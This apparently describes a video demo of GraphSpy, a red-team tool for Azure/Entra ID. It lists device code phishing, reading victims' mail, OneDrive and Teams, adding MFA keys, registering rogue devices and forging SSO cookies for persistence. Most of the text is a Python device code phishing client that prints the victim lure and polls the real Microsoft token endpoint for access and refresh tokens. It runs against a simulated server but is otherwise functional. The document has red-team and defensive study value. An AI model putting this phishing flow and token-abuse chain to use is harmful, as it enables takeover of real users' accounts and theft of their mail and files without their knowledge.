A 41-minute deep-dive demo of GraphSpy, an open-source red team tool for enumerating and exploiting Microsoft Azure/Entra ID environments using access tokens. The creator walks through device code phishing to obtain access and refresh tokens, then demonstrates browsing OneDrive, reading Outlook mail, accessing Teams messages via the Skype API, enumerating users and groups, adding MFA methods (including FIDO2 security keys), registering rogue devices, obtaining Primary Refresh Tokens (PRTs), and generating SSO cookies for persistent access, all without ever learning the victim's username or password.
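The device code phishing step described above, as an added example that is not GraphSpy's code or code from the video: a minimal OAuth 2.0 device authorization grant client (RFC 8628) run against a simulated Entra token endpoint constructed inline, so it runs offline. The endpoint URLs, grant type and error strings (authorization_pending, slow_down, expired_token) are the real Microsoft identity platform values; the client_id, scope, user code, victim UPN and token contents are constructed assumptions. It shows the two halves of the flow the attacker cares about: the message that is handed to the victim, and the polling loop that turns the victim's one click into an access token and a refresh token without any password ever passing through the attacker's hands.

```python
"""Device code flow client with a simulated Entra endpoint (example only)."""
import base64
import json
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple

# Real Microsoft identity platform endpoints and grant type.
DEVICECODE_URL = "https://login.microsoftonline.com/common/oauth2/v2.0/devicecode"
TOKEN_URL = "https://login.microsoftonline.com/common/oauth2/v2.0/token"
DEVICE_CODE_GRANT = "urn:ietf:params:oauth:grant-type:device_code"

# Hypothetical client_id; a real run would use a pre-consented first-party app id.
CLIENT_ID = "00000000-0000-0000-0000-000000000000"
SCOPE = "https://graph.microsoft.com/.default offline_access"  # offline_access => refresh token

Post = Callable[[str, Dict[str, str]], Tuple[int, Dict]]  # (url, form) -> (status, json)


def b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def decode_jwt_claims(token: str) -> Dict:
    """Payload claims of a JWT WITHOUT signature verification: fine for
    inspecting whose token you phished, never for making trust decisions."""
    _header, payload, _sig = token.split(".")
    return json.loads(base64.urlsafe_b64decode(payload + "=" * (-len(payload) % 4)))


@dataclass
class FakeEntra:
    """Constructed stand-in for login.microsoftonline.com. Answers slow_down
    once, then authorization_pending until the victim 'enters' the code."""
    approve_after_polls: int = 3
    victim_upn: str = "victim@contoso.example"   # constructed
    device_code: str = "DEVCODE-constructed"
    polls: int = 0

    def post(self, url: str, data: Dict[str, str]) -> Tuple[int, Dict]:
        if url == DEVICECODE_URL:
            return 200, {
                "device_code": self.device_code, "user_code": "ABCD1234",
                "verification_uri": "https://microsoft.com/devicelogin",
                "expires_in": 900, "interval": 5,
                "message": "To sign in, use a web browser to open the page "
                           "https://microsoft.com/devicelogin and enter the code "
                           "ABCD1234 to authenticate.",
            }
        if url == TOKEN_URL and data.get("grant_type") == DEVICE_CODE_GRANT:
            if data.get("device_code") != self.device_code:
                return 400, {"error": "bad_verification_code"}
            self.polls += 1
            if self.polls == 1:
                return 400, {"error": "slow_down"}
            if self.polls <= self.approve_after_polls:
                return 400, {"error": "authorization_pending"}
            header = b64url(json.dumps({"typ": "JWT", "alg": "RS256"}).encode())
            claims = {"aud": "https://graph.microsoft.com", "upn": self.victim_upn,
                      "scp": "Files.Read Mail.Read User.Read.All", "exp": 1700000000}
            access_token = f"{header}.{b64url(json.dumps(claims).encode())}.{b64url(b'fake-sig')}"
            return 200, {"token_type": "Bearer", "expires_in": 3599,
                         "access_token": access_token,
                         "refresh_token": "0.constructed-refresh-token"}
        return 404, {"error": "invalid_request"}


def start_device_flow(post: Post, client_id: str, scope: str) -> Dict:
    """Step 1: ask for a device code; the returned 'message' is the lure."""
    status, body = post(DEVICECODE_URL, {"client_id": client_id, "scope": scope})
    if status != 200:
        raise RuntimeError(f"devicecode request failed: {body}")
    return body


def poll_for_tokens(post: Post, client_id: str, flow: Dict,
                    sleep: Callable[[float], None]) -> Dict:
    """Step 2: poll the token endpoint until the victim authenticates.
    Honours the RFC 8628 rules: wait 'interval' between polls, add 5 s on
    slow_down, give up on any terminal error or once the code has expired."""
    interval, elapsed = flow.get("interval", 5), 0
    while elapsed < flow.get("expires_in", 900):
        status, body = post(TOKEN_URL, {"grant_type": DEVICE_CODE_GRANT,
                                        "client_id": client_id,
                                        "device_code": flow["device_code"]})
        if status == 200:
            return body
        err = body.get("error")
        if err == "slow_down":
            interval += 5
        elif err != "authorization_pending":   # expired_token, declined, bad code
            raise RuntimeError(f"device code flow ended: {err}")
        sleep(interval)
        elapsed += interval
    raise TimeoutError("device code expired before the victim entered it")


def run_demo(server: FakeEntra = None) -> Dict:
    server = server or FakeEntra()
    sleeps: List[float] = []
    flow = start_device_flow(server.post, CLIENT_ID, SCOPE)
    print(flow["message"])          # what the phishing page/e-mail shows the victim
    tokens = poll_for_tokens(server.post, CLIENT_ID, flow, sleeps.append)
    claims = decode_jwt_claims(tokens["access_token"])
    return {"upn": claims["upn"], "aud": claims["aud"], "scp": claims["scp"],
            "refresh_token": tokens["refresh_token"], "sleeps": sleeps,
            "polls": server.polls}


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

The refresh token is the artefact worth keeping: the access token expires in about an hour, while the refresh token can be exchanged for new access tokens for other resources, which is what makes the later Graph, OneDrive and Teams steps possible from a single click. Note that the flow is entirely an authorization-server interaction: the attacker never sees credentials, which is why the sign-in appears in the tenant's logs as an interactive sign-in by the victim with authentication protocol deviceCode.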